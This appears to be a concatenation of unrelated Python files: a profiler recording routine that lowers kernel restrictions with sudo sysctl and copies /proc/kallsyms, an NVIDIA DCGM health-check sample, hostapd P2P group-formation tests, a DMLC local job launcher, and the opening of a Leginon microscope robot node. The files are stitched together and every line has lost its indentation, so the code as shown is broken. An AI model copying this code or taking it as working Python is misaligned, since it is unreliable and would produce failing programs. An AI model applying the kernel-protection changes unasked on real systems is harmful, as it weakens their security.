os.system('sudo sysctl -w kernel.kptr_restrict=0')
os.system('sudo sysctl -w kernel.perf_event_paranoid=-1')
if int(open("/proc/sys/kernel/yama/ptrace_scope").read()) != 0:
print_error(
"Could not attach to process, please try the command below:")
print_error("sudo sysctl -w kernel.yama.ptrace_scope=0")
sys.exit(1)
if int(open("/proc/sys/kernel/kptr_restrict").read()) != 0:
print_error(
"/proc/kallsyms permission is restricted, please try the command below:")
print_error("sudo sysctl -w kernel.kptr_restrict=0")
sys.exit(1)
if int(open("/proc/sys/kernel/perf_event_paranoid").read()) != -1:
print_error('PerfEvent is not avaiable, please try the command below:')
print_error('sudo sysctl -w kernel.perf_event_paranoid=-1')
sys.exit(1)
if cfg.enable_pcm:
print_info(cfg,'Test Capability of PCM programs ...')
ret = str(subprocess.check_output(['getcap `which pcm-memory.x`'], shell=True))
if ret.find('cap_sys_rawio+ep') == -1:
print_error('To read/write MSR in userspace is not avaiable, please try the commands below:')
print_error('sudo modprobe msr')
print_error('sudo setcap cap_sys_rawio=ep `which pcm-memory.x`')
sys.exit(1)
if subprocess.call(['mkdir', '-p', logdir]) != 0:
print_error('Cannot create the directory' + logdir + ',which is needed for sofa logged files.' )
sys.exit(1)
print_info(cfg,'Read NMI watchlog status ...')
nmi_output = ""
try:
with open(logdir+"nmi_status.txt", 'w') as f:
p_pcm_pcie = subprocess.Popen(['yes | timeout 3 pcm-pcie.x'], shell=True, stdout=f)
if p_pcm_pcie != None:
p_pcm_pcie.kill()
print_info(cfg,"tried killing pcm-pcie.x")
os.system('pkill pcm-pcie.x')
with open(logdir+"nmi_status.txt", 'r') as f:
lines = f.readlines()
if len(lines) > 0:
if lines[0].find('Error: NMI watchdog is enabled.') != -1:
print_error('NMI watchdog is enabled., please try the command below:')
print_error('sudo sysctl -w kernel.nmi_watchdog=0')
# output = subprocess.check_output('yes | timeout 3 pcm-pcie.x 2>&1', shell=True)
except subprocess.CalledProcessError as e:
print_warning("There was error while reading NMI status.")
print_info(cfg,'Clean previous logged files')
# Not equal to sofa_clean(...) !!
subprocess.call('rm %s/perf.data > /dev/null 2> /dev/null' % logdir, shell=True )
subprocess.call('rm %s/cuhello.perf.data > /dev/null 2> /dev/null' % logdir, shell=True )
subprocess.call('rm %s/sofa.pcap > /dev/null 2> /dev/null' % logdir, shell=True)
subprocess.call('rm %s/gputrace*.nvvp > /dev/null 2> /dev/null' % logdir, shell=True)
subprocess.call('rm %s/cuhello*.nvvp > /dev/null 2> /dev/null' % logdir, shell=True)
subprocess.call('rm %s/gputrace.tmp > /dev/null 2> /dev/null' % logdir, shell=True)
subprocess.call('rm %s/*.csv > /dev/null 2> /dev/null' % logdir, shell=True)
subprocess.call('rm %s/*.txt > /dev/null 2> /dev/null' % logdir, shell=True)
try:
print_progress("Prologue of Recording...")
if int(os.system('command -v nvprof 1> /dev/null')) == 0:
p_nvprof = subprocess.Popen(['nvprof', '--profile-all-processes', '-o', logdir+'/gputrace%p.nvvp'], stderr=DEVNULL, stdout=DEVNULL)
print_info(cfg,'Launching nvprof')
time.sleep(3)
print_info(cfg,'nvprof is launched')
else:
print_warning('Profile without NVPROF')
if cfg.enable_pcm:
with open(os.devnull, 'w') as FNULL:
delay_pcie = 0.02
#p_pcm_pcie = subprocess.Popen(['yes|pcm-pcie.x ' + str(delay_pcie) + ' -csv=sofalog/pcm_pcie.csv -B '], shell=True)
p_pcm_memory = subprocess.Popen(['yes|pcm-memory.x ' + str(delay_pcie) + ' -csv=sofalog/pcm_memory.csv '], shell=True)
#p_pcm_numa = subprocess.Popen(['yes|pcm-numa.x ' + str(delay_pcie) + ' -csv=sofalog/pcm_numa.csv '], shell=True)
print_progress("Recording...")
if cfg.profile_all_cpus == True:
perf_options = '-a'
else:
perf_options = ''
if cfg.ds:
os.system('sudo ntpd -u ntp:ntp')
os.system('sudo ntpq -p')
ds_prof = subprocess.call(['sudo', 'sleep', '1'])
#os.system('sudo %s/bpf_ds.py > %sds_trace&'%(cfg.script_path,logdir))
#os.system('sudo %s/dds.py > %sdds_trace&'%(cfg.script_path,logdir))
os.system('sudo %s/DDS/bpf_ds_dds.py > %sds_dds_trace&'%(cfg.script_path,logdir))
os.system('basename %s > %scommand.txt' % (command, logdir))
subprocess.call('cp /proc/kallsyms %s/' % (logdir), shell=True )
subprocess.call('chmod +w %s/kallsyms' % (logdir), shell=True )
print_info(cfg,"Script path of SOFA: "+cfg.script_path)
with open(logdir+'/perf_timebase.txt', 'w') as logfile:
subprocess.call('%s/sofa_perf_timebase' % (cfg.script_path), shell=True, stderr=logfile, stdout=logfile)
subprocess.call('nvprof --profile-child-processes -o %s/cuhello%%p.nvvp -- perf record -q -o %s/cuhello.perf.data %s/cuhello' % (logdir,logdir,cfg.script_path), shell=True, stderr=DEVNULL, stdout=DEVNULL)
if int(os.system('perf 2>&1 1>/dev/null')) == 0:
subprocess.call('nvprof --profile-child-processes -o %s/cuhello%%p.nvvp -- perf record -q -o %s/cuhello.perf.data %s/cuhello' % (logdir,logdir,cfg.script_path), shell=True, stderr=DEVNULL, stdout=DEVNULL)
else:
subprocess.call('nvprof --profile-child-processes -o %s/cuhello%%p.nvvp -- /usr/bin/time -v %s/cuhello' % (logdir,cfg.script_path), shell=True, stderr=DEVNULL, stdout=DEVNULL)
# sofa_time is time base for vmstat, nvidia-smi
with open('%s/sofa_time.txt' % logdir, 'w') as logfile:
unix_time = time.time()
logfile.write(str('%.9lf'%unix_time)+'\n')
with open('%s/vmstat.txt' % logdir, 'w') as logfile:
p_vmstat = subprocess.Popen(['vmstat', '-w', '1'], stdout=logfile)
if cfg.blktrace_device is not None:
p_blktrace = subprocess.Popen(['blktrace', '-d', '/dev/%s' % cfg.blktrace_device], stdout=DEVNULL)
with open('%s/cpuinfo.txt' % logdir, 'w') as logfile:
logfile.write('')
timerThread = threading.Thread(target=service_get_cpuinfo, args=[logdir])
timerThread.daemon = True
timerThread.start()
with open('%s/mpstat.txt' % logdir, 'w') as logfile:
logfile.write('time,cpu,user,nice,system,idle,iowait,irq,softirq\n')
timerThread = threading.Thread(target=service_get_mpstat, args=[logdir])
timerThread.daemon = True
timerThread.start()
with open('%s/diskstat.txt' % logdir, 'w') as logfile:
logfile.write('')
timerThread = threading.Thread(target=service_get_diskstat, args=[logdir])
timerThread.daemon = True
timerThread.start()
with open('%s/netstat.txt' % logdir, 'w') as logfile:
logfile.write('')
interface = subprocess.check_output("ip addr | awk '/state UP/{print $2}'", shell=True)
interface = str(interface, 'utf-8')
if cfg.netstat_interface is not None:
interface = cfg.netstat_interface
else:
interface = interface.split(':')[0]
timerThread = threading.Thread(target=service_get_netstat, args=[logdir, interface])
timerThread.daemon = True
timerThread.start()
if cfg.enable_tcpdump:
with open(os.devnull, 'w') as FNULL:
p_tcpdump = subprocess.Popen(["tcpdump",
'-i',
'any',
'-w',
'%s/sofa.pcap' % logdir],
stderr=FNULL)
if int(os.system('command -v nvidia-smi 1>/dev/null')) == 0:
with open('%s/nvsmi.txt' % logdir, 'w') as logfile:
p_nvsmi = subprocess.Popen(['nvidia-smi', 'dmon', '-s', 'u'], stdout=logfile)
with open('%s/nvsmi_query.txt' % logdir, 'w') as logfile:
p_nvsmi_query = subprocess.Popen(['nvidia-smi', '--query-gpu=timestamp,gpu_name,index,utilization.gpu,utilization.memory',
'-lms', '100', '--format=csv'], stdout=logfile)
with open('%s/nvlink_topo.txt' % logdir, 'w') as logfile:
p_nvtopo = subprocess.Popen(['nvidia-smi', 'topo', '-m'], stdout=logfile)
# Primary Profiled Program
if cfg.pid > 0 :
target_pid = cfg.pid
else:
target_pid = -1
t_command_begin = time.time()
print_hint('PID of the target program: %d' % target_pid)
print_hint('Command: %s' % command)
if cfg.enable_py_stacks:
if command.find('python') == -1:
print_warning("Not a python program to recorded, skip recording callstacks")
elif cfg.enable_strace:
print_warning("Only one of --enable_py_stacks or --enable_strace option holds, ignore --enable_py_stack options")
else:
# command_prefix = ' '.join(['py-spy','-n', '-s', '{}/pystacks.txt'.format(logdir), '-d', str(sys.maxsize), '--']) + ' '
command_prefix = ' '.join(['pyflame', '--flamechart', '-o', '{}pystacks.txt'.format(logdir), '-t']) + ' '
if cfg.enable_strace:
command_prefix = ' '.join(['strace', '-q', '-T', '-t', '-tt', '-f', '-o', '%s/strace.txt'%logdir]) + ' '
if cfg.ds:
bpf_timebase = open(logdir + '/bpf_timebase.txt', 'w')
subprocess.call('%s/real_mono_diff' % (cfg.script_path), shell=True, stderr=bpf_timebase, stdout=bpf_timebase)
if int(os.system('command -v perf 1> /dev/null')) == 0:
ret = str(subprocess.check_output(['perf stat -e cycles ls 2>&1 '], shell=True))
if ret.find('not supported') >=0:
profile_command = 'perf record -o %s/perf.data -F %s %s %s' % (logdir, sample_freq, perf_options, command_prefix+command)
cfg.perf_events = ""
else:
profile_command = 'perf record -o %s/perf.data -e %s -F %s %s %s' % (logdir, cfg.perf_events, sample_freq, perf_options, command_prefix+command)
else:
print_warning("Use /usr/bin/time to measure program performance instead of perf.")
profile_command = '/usr/bin/time -v %s' % (command_prefix+command)
cfg.perf_events = ""
with open(logdir+'perf_events_used.txt','w') as f:
f.write(cfg.perf_events)
print_hint(profile_command)
p_perf = subprocess.Popen(profile_command, shell=True)
try:
p_perf.wait()
t_command_end = time.time()
except TimeoutExpired:
print_error('perf: Timeout of profiling process')
sys.exit(1)
with open('%s/misc.txt' % logdir, 'w') as f_misc:
vcores = 0
cores = 0
with open('/proc/cpuinfo','r') as f:
lines = f.readlines()
vcores = 0
cores = 0
for line in lines:
if line.find('cpu cores') != -1:
cores = int(line.split()[3])
vcores = vcores + 1
f_misc.write('elapsed_time %.6lf\n' % (t_command_end - t_command_begin))
f_misc.write('cores %d\n' % (cores))
f_misc.write('vcores %d\n' % (vcores))
f_misc.write('pid %d\n' % (target_pid))
print_progress("Epilogue of Recording...")
if p_tcpdump != None:
p_tcpdump.terminate()
print_info(cfg,"tried terminating tcpdump")
if p_vmstat != None:
p_vmstat.terminate()
print_info(cfg,"tried terminating vmstat")
if p_blktrace != None:
p_blktrace.terminate()
if cfg.blktrace_device is not None:
os.system('sudo blkparse -i %s -o %s/blktrace.txt > /dev/null' % (cfg.blktrace_device,logdir))
os.system('rm -rf %s.blktrace.*' % cfg.blktrace_device)
print_info(cfg,"tried terminating blktrace")
if p_cpuinfo != None:
p_cpuinfo.terminate()
print_info(cfg,"tried terminating cpuinfo")
if p_mpstat != None:
p_mpstat.terminate()
print_info(cfg,"tried terminating mpstat")
if p_diskstat != None:
p_diskstat.terminate()
print_info(cfg,"tried terminating diskstat")
if p_netstat != None:
p_netstat.terminate()
print_info(cfg,"tried terminating netstat")
if p_nvtopo != None:
p_nvtopo.terminate()
print_info(cfg,"tried terminating nvidia-smi topo")
if p_nvsmi != None:
if p_nvsmi.poll() is None:
p_nvsmi.terminate()
print_info(cfg,"tried terminating nvidia-smi dmon")
else:
open('%s/nvsmi.txt' % logdir, 'a').write('\nFailed\n')
if p_nvsmi_query != None:
if p_nvsmi_query.poll() is None:
p_nvsmi_query.terminate()
print_info(cfg,"tried terminating nvidia-smi query")
else:
open('%s/nvsmi_query.txt' % logdir, 'a').write('\nFailed\n')
if p_nvprof != None:
p_nvprof.terminate()
print_info(cfg,"tried terminating nvprof")
if cfg.enable_pcm:
kill_pcm_modules(cfg, p_pcm_pcie, p_pcm_memory, p_pcm_numa)
if p_strace != None:
p_strace.terminate()
print_info(cfg,"tried terminating strace")
if cfg.ds:
#os.system('sudo pkill bpf')
#os.system('sudo pkill dds')
os.system('sudo pkill bpf_ds_dds')
with open(logdir + 'pid.txt', 'w') as pidfd:
subprocess.call(['perf', 'script', '-i%sperf.data'%logdir, '-F', 'pid'], stdout=pidfd)
pidAsNodeName = None
with open(logdir + 'pid.txt') as pidfd:
pidAsNodeName = int(pidfd.readline())
os.system('mv %s %sds_finish/%d/' % (logdir, cfg.logdir, pidAsNodeName))
os.system('rm perf.data')
except BaseException:
print("Unexpected error:", sys.exc_info()[0])
if p_tcpdump != None:
p_tcpdump.kill()
print_info(cfg,"tried killing tcpdump")
if p_vmstat != None:
p_vmstat.kill()
print_info(cfg,"tried killing vmstat")
if p_blktrace != None:
p_blktrace.terminate()
if cfg.blktrace_device is not None:
os.system('sudo blkparse -i %s -o %s/blktrace.txt > /dev/null' % (cfg.blktrace_device,logdir))
os.system('rm -rf %s.blktrace.*' % cfg.blktrace_device)
print_info(cfg,"tried terminating blktrace")
if p_cpuinfo != None:
p_cpuinfo.kill()
print_info(cfg,"tried killing cpuinfo")
if p_mpstat != None:
p_mpstat.kill()
print_info(cfg,"tried killing mpstat")
if p_diskstat != None:
p_diskstat.kill()
print_info(cfg,"tried killing diskstat")
if p_netstat != None:
p_netstat.kill()
print_info(cfg, "tried killing netstat")
if p_nvtopo != None:
p_nvtopo.kill()
print_info(cfg,"tried killing nvidia-smi topo")
if p_nvsmi != None:
p_nvsmi.kill()
print_info(cfg,"tried killing nvidia-smi dmon")
if p_nvsmi_query != None:
p_nvsmi_query.kill()
print_info(cfg,"tried killing nvidia-smi query")
if p_nvprof != None:
p_nvprof.kill()
print_info(cfg,"tried killing nvprof")
if cfg.enable_pcm:
kill_pcm_modules(cfg, p_pcm_pcie, p_pcm_memory, p_pcm_numa)
if p_strace != None:
p_strace.kill()
print_info(cfg,"tried killing strace")
raise
print_progress("End of Recording")
|
dcgm_health_check.py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '../')
import dcgm_structs
import dcgm_fields
import dcgm_agent
import dcgmvalue
from threading import Thread
from time import sleep
## Look at __name__ == "__main__" for entry point to the script
class RunDCGM():
def __init__(self, ip, opMode):
self.ip = ip
self.opMode = opMode
def __enter__(self):
dcgm_structs._dcgmInit()
self.handle = dcgm_agent.dcgmInit()
return self.handle
def __exit__(self, eType, value, traceback):
dcgm_agent.dcgmShutdown()
## Helper method to convert enum to system name
def helper_convert_system_enum_to_sytem_name(system):
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_PCIE):
return "PCIe"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_NVLINK):
return "NvLink"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_PMU):
return "PMU"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_MCU):
return "MCU"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_MEM):
return "MEM"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_SM):
return "SM"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_INFOROM):
return "Inforom"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_THERMAL):
return "Thermal"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_POWER):
return "Power"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_DRIVER):
return "Driver"
## helper method to convert helath return to a string for display purpose
def convert_overall_health_to_string(health):
if health == dcgm_structs.DCGM_HEALTH_RESULT_PASS:
return "Pass"
elif health == dcgm_structs.DCGM_HEALTH_RESULT_WARN:
return "Warn"
elif health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL:
return "Fail"
else :
return "N/A"
## Worker function
def agent_worker_function(dcgmHandle, groupId):
NUM_ITERATIONS = 5
count = 0
groupId = groupId
## Add the health watches
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_ALL
dcgm_agent.dcgmHealthSet(dcgmHandle, groupId, newSystems)
while True:
dcgm_agent.dcgmUpdateAllFields(dcgmHandle, 1)
try:
## Invoke Health checks
group_health = dcgm_agent.dcgmHealthCheck(dcgmHandle, groupId)
print("Overall Health for the group: %s" % convert_overall_health_to_string(group_health.overallHealth))
for index in range (0, group_health.gpuCount):
print("GPU ID : %d" % group_health.gpu[index].gpuId)
for incident in range (0, group_health.gpu[index].incidentCount):
print("system tested : %d" % group_health.gpu[index].systems[incident].system)
print("system health : %s" % convert_overall_health_to_string(group_health.gpu[index].systems[incident].health))
print("system health err : %s" % group_health.gpu[index].systems[incident].errorString)
print("\n")
except dcgm_structs.DCGMError as e:
errorCode = e.value
print("dcgmEngineHelathCheck returned error: %d" % errorCode)
sys.exc_clear()
count = count + 1
if count == NUM_ITERATIONS:
break
sleep(2)
## Main
def main():
## Initilaize the DCGM Engine as manual operation mode. This implies that it's execution is
## controlled by the monitoring agent. The user has to periodically call APIs such as
## dcgmEnginePolicyTrigger and dcgmEngineUpdateAllFields which tells DCGM to wake up and
## perform data collection and operations needed for policy management.
with RunDCGM('127.0.0.1', dcgm_structs.DCGM_OPERATION_MODE_MANUAL) as handle:
## Create a default group. (Default group is comprised of all the GPUs on the node)
## Let's call the group as "all_gpus_group". The method returns an opaque handle (groupId) to
## identify the newly created group.
groupId = dcgm_agent.dcgmGroupCreate(handle, dcgm_structs.DCGM_GROUP_DEFAULT, "all_gpus_group")
## Invoke method to get information on the newly created group
groupInfo = dcgm_agent.dcgmGroupGetInfo(handle, groupId)
## Create reference to DCGM status handler which can be used to get the statuses for multiple
## operations on one or more devices present in the group
status_handle = dcgm_agent.dcgmStatusCreate()
## The worker function can be executed as a separate thread or as part of the main thread.
## Executed as a separate thread here
thread = Thread(target = agent_worker_function, args = (handle, groupId))
thread.start()
##########################################
# Any other useful work can be placed here
##########################################
thread.join()
print("Worker thread completed")
## Destroy the group
try:
dcgm_agent.dcgmGroupDestroy(handle, groupId)
except dcgm_structs.DCGMError as e:
print("Failed to remove the test group, error: %s" % e, file=sys.stderr)
sys.exit(1)
## Destroy the status handle
try:
dcgm_agent.dcgmStatusDestroy(status_handle)
except dcgm_structs.DCGMError as e:
print("Failed to remove status handler, error: %s" % e, file=sys.stderr)
sys.exit(1)
if __name__ == '__main__':
main()
|
test_p2p_grpform.py
|
#!/usr/bin/python
#
# P2P group formation test cases
# Copyright (c) 2013, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger(__name__)
import time
import threading
import Queue
import hwsim_utils
def check_grpform_results(i_res, r_res):
if i_res['result'] != 'success' or r_res['result'] != 'success':
raise Exception("Failed group formation")
if i_res['ssid'] != r_res['ssid']:
raise Exception("SSID mismatch")
if i_res['freq'] != r_res['freq']:
raise Exception("SSID mismatch")
if i_res['go_dev_addr'] != r_res['go_dev_addr']:
raise Exception("GO Device Address mismatch")
def go_neg_init(i_dev, r_dev, pin, i_method, i_intent, res):
logger.debug("Initiate GO Negotiation from i_dev")
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=15, go_intent=i_intent)
logger.debug("i_res: " + str(i_res))
res.put(i_res)
def go_neg_pin(i_dev, r_dev, i_intent=None, r_intent=None, i_method='enter', r_method='display'):
r_dev.p2p_listen()
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init, args=(i_dev, r_dev, pin, i_method, i_intent, res))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, timeout=15)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
def go_neg_pin_authorized(i_dev, r_dev, i_intent=None, r_intent=None, expect_failure=False, i_go_neg_status=None, i_method='enter', r_method='display'):
r_dev.p2p_listen()
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent)
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=15, go_intent=i_intent, expect_failure=expect_failure)
r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
logger.debug("i_res: " + str(i_res))
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
i_dev.dump_monitor()
if i_go_neg_status:
if i_res['result'] != 'go-neg-failed':
raise Exception("Expected GO Negotiation failure not reported")
if i_res['status'] != i_go_neg_status:
raise Exception("Expected GO Negotiation status not seen")
if expect_failure:
return
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
def go_neg_init_pbc(i_dev, r_dev, i_intent, res):
logger.debug("Initiate GO Negotiation from i_dev")
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc", timeout=15, go_intent=i_intent)
logger.debug("i_res: " + str(i_res))
res.put(i_res)
def go_neg_pbc(i_dev, r_dev, i_intent=None, r_intent=None):
r_dev.p2p_find(social=True)
i_dev.p2p_find(social=True)
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init_pbc, args=(i_dev, r_dev, i_intent, res))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), None, "pbc", go_intent=r_intent, timeout=15)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def test_grpform(dev):
"""P2P group formation using PIN and authorized connection (init -> GO)"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
dev[0].remove_group()
try:
dev[1].remove_group()
except:
pass
def test_grpform2(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO)"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
dev[0].remove_group()
try:
dev[1].remove_group()
except:
pass
def test_grpform3(dev):
"""P2P group formation using PIN and re-init GO Negotiation"""
go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
dev[0].remove_group()
try:
dev[1].remove_group()
except:
pass
def test_grpform_pbc(dev):
"""P2P group formation using PBC and re-init GO Negotiation"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
if i_res['role'] != 'GO' or r_res['role'] != 'client':
raise Exception("Unexpected device roles")
dev[0].remove_group()
try:
dev[1].remove_group()
except:
pass
def test_both_go_intent_15(dev):
"""P2P GO Negotiation with both devices using GO intent 15"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=15, expect_failure=True, i_go_neg_status=9)
def test_both_go_neg_display(dev):
"""P2P GO Negotiation with both devices trying to display PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='display', r_method='display')
def test_both_go_neg_enter(dev):
"""P2P GO Negotiation with both devices trying to enter PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='enter', r_method='enter')
|
dmlc_local.py
|
#!/usr/bin/env python
"""
DMLC submission script, local machine version
"""
import argparse
import sys
import os
import subprocess
from threading import Thread
import tracker
import signal
import logging
parser = argparse.ArgumentParser(description='DMLC script to submit dmlc jobs as local process')
parser.add_argument('-n', '--nworker', required=True, type=int,
help = 'number of worker nodes to be launched')
parser.add_argument('-s', '--server-nodes', default = 0, type=int,
help = 'number of server nodes to be launched')
parser.add_argument('--log-level', default='INFO', type=str,
choices=['INFO', 'DEBUG'],
help = 'logging level')
parser.add_argument('--log-file', type=str,
help = 'output log to the specific log file')
parser.add_argument('command', nargs='+',
help = 'command for launching the program')
args, unknown = parser.parse_known_args()
keepalive = """
nrep=0
rc=254
while [ $rc -eq 254 ];
do
export DMLC_NUM_ATTEMPT=$nrep
%s
rc=$?;
nrep=$((nrep+1));
done
"""
def exec_cmd(cmd, role, taskid, pass_env):
if cmd[0].find('/') == -1 and os.path.exists(cmd[0]) and os.name != 'nt':
cmd[0] = './' + cmd[0]
cmd = ' '.join(cmd)
env = os.environ.copy()
for k, v in pass_env.items():
env[k] = str(v)
env['DMLC_TASK_ID'] = str(taskid)
env['DMLC_ROLE'] = role
ntrial = 0
while True:
if os.name == 'nt':
env['DMLC_NUM_ATTEMPT'] = str(ntrial)
ret = subprocess.call(cmd, shell=True, env = env)
if ret == 254:
ntrial += 1
continue
else:
bash = keepalive % (cmd)
ret = subprocess.call(bash, shell=True, executable='bash', env = env)
if ret == 0:
logging.debug('Thread %d exit with 0')
return
else:
if os.name == 'nt':
os.exit(-1)
else:
raise Exception('Get nonzero return code=%d' % ret)
#
# Note: this submit script is only used for demo purpose
# submission script using pyhton multi-threading
#
def mthread_submit(nworker, nserver, envs):
"""
customized submit script, that submit nslave jobs, each must contain args as parameter
note this can be a lambda function containing additional parameters in input
Parameters
nworker number of slave process to start up
nserver number of server nodes to start up
envs enviroment variables to be added to the starting programs
"""
procs = {}
for i in range(nworker + nserver):
if i < nworker:
role = 'worker'
else:
role = 'server'
procs[i] = Thread(target = exec_cmd, args = (args.command, role, i, envs))
procs[i].setDaemon(True)
procs[i].start()
tracker.config_logger(args)
# call submit, with nslave, the commands to run each job and submit function
tracker.submit(args.nworker, args.server_nodes, fun_submit = mthread_submit,
pscmd= (' '.join(args.command) + ' ' + ' '.join(unknown)))
|
robot2.py
|
#
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from PIL import Image
import sys
import threading
import time
from leginon import leginondata
import emailnotification
import event
import instrument
import node
import project
import gui.wx.Robot
import Queue
import sinedon
# ...
def seconds2str(seconds):
seconds = int(seconds)
minute = 60
hour = 60*minute
day = 24*hour
week = 7*day
weeks = seconds / week
string = ''
if weeks:
if weeks == 1:
value = ''
else:
value = 's'
string += '%i week%s, ' % (weeks, value)
seconds %= week
days = seconds / day
if days or string:
if days == 1:
value = ''
else:
value = 's'
string += '%i day%s, ' % (days, value)
seconds %= day
hours = seconds / hour
if hours or string:
if hours == 1:
value = ''
else:
value = 's'
string += '%i hour%s, ' % (hours, value)
seconds %= hour
minutes = seconds / minute
if minutes or string:
if minutes == 1:
value = ''
else:
value = 's'
string += '%i minute%s, ' % (minutes, value)
seconds %= minute
if seconds or string:
if seconds == 1:
value = ''
else:
value = 's'
string += '%i second%s' % (seconds, value)
return string
## these are the names of the robot attributes
robotattrs = ['Signal' + str(i) for i in range(0,13)]
robotattrs.append('gridNumber')
class TestCommunication(object):
def __init__(self):
self.gridNumber = -1
for a in robotattrs:
setattr(self, a, 0)
robotattrtypemap = [(robotattr, int) for robotattr in robotattrs]
class RobotAttributes(sinedon.Data):
"sinedon object to contain robot attributes"
def typemap(cls):
return sinedon.Data.typemap() + tuple(robotattrtypemap)
typemap = classmethod(typemap)
class DatabaseCommunication(object):
def __setattr__(self, name, value):
print 'SET', name, value
## get current robot attrs from DB
rattrs = RobotAttributes().query(results=1)
if rattrs:
# copy the old one
rattrs = RobotAttributes(initializer=rattrs[0])
else:
# create a new one if
rattrs = RobotAttributes()
## update one of the attrs
rattrs[name] = value
## store new attrs to DB
rattrs.insert(force=True)
def __getattr__(self, name):
## get current robot attrs from DB
rattrs = RobotAttributes().query(results=1)
if rattrs is None:
return None
else:
return rattrs[0][name]
class RobotException(Exception):
pass
class GridException(Exception):
pass
class GridQueueEmpty(GridException):
pass
class GridLoadError(GridException):
pass
class GridLoadFromTrayError(GridException):
pass
class GridUnloadError(GridException):
pass
def validateGridNumber(gridnumber):
if not isinstance(gridnumber, int):
return False
if gridnumber >= 1 and gridnumber <= 96:
return True
else:
return False
class Request(object):
def __init__(self):
self.event = threading.Event()
class ExitRequest(Request):
pass
class GridRequest(Request):
def __init__(self, number, gridid=None, node=None, griddata=None):
Request.__init__(self)
self.number = number
self.loaded = False
self.gridid = gridid
self.node = node
self.griddata = griddata
class Robot2(node.Node):
panelclass = gui.wx.Robot.Panel
eventinputs = node.Node.eventinputs + [event.TargetListDoneEvent,
event.UnloadGridEvent,
event.QueueGridEvent,
event.QueueGridsEvent,
event.MosaicDoneEvent]
eventoutputs = node.Node.eventoutputs + [event.MakeTargetListEvent,
event.GridLoadedEvent,
event.EmailEvent]
settingsclass = leginondata.RobotSettingsData
defaultsettings = {
'column pressure threshold': 3.5e-5,
'default Z position': 0,
'simulate': True,
'turbo on': True,
'pause': False,
'grid tray': None,
'grid clear wait': False,
}
defaultcolumnpressurethreshold = 3.5e-5
defaultzposition = 0
def __init__(self, id, session, managerlocation, **kwargs):
node.Node.__init__(self, id, session, managerlocation, **kwargs)
self.instrument = instrument.Proxy(self.objectservice, self.session)
